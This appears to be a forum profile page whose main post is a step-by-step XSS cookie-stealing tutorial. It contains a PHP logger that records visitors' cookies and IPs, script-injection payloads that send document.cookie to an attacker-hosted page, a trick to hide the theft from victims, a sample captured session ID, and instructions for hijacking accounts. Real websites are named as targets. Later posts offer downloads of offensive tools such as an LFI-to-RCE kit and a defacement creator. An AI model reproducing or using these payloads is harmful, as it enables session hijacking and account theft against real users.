$_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>"); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?> This script will record the cookies of every user that views it. Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection: "><script language= "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie;document.location="http://www.rozee.pk/"</script> yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer: "><a href="#" onclick="document.location='http://yoursite.com/whateveryouwant.php?cookie=' +escape(document.cookie);"><Click Me></a></script> This will eliminate the looping problem since the user has to cilck on it for it to work, and it's only a one-way link. Of course, then the user's trail ends at your cookie stealing script, so you'd need to modify that code a little to keep them from suspecting what's going on. You Could just add some text to the page saying something like "under construction" by changing the end of our php script from this: logData(); ?> to this: logData(); echo '<b>Page Under Construction</b>' ?> Now when you open log.txt, you should see something like this: IP: 125.16.48.169 | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: [url]http://www.ifa.org.nz/search.php[/url] | DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373 You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames. Summary So in summary: 1. Test the page to make sure it's vulnerable to XSS injections. 2. Once you know it's vulnerable, upload the cookie stealer php file and log file to your server. 3. Insert the injection into the page via the url or text box. 4. Grab the link of that page with your exploited search query (if injection is not stored on the server's copy of the page). 5. Get someone to use that link if necessary. 6. Check your log file for their cookie. 7. Modify your own cookie to match the captured one and refresh the page.
  21. LegioNRST
    Download Lfi2Rce @ UppIT
  22. LegioNRST
    Download Advanced.Deface.Creator.rar @ UppIT
  23. LegioNRST
    Image: Download: Download MaxISploit.rar @ UppIT
  24. LegioNRST
    Cu Yahoo nu mai tine metoda..decat cu diferite executabile sa pacalesti victima.
  25. LegioNRST

    Blog IT

    LegioNRST replied to giok123's topic in Linkuri

    tare blogu`
×
×
  • Create New...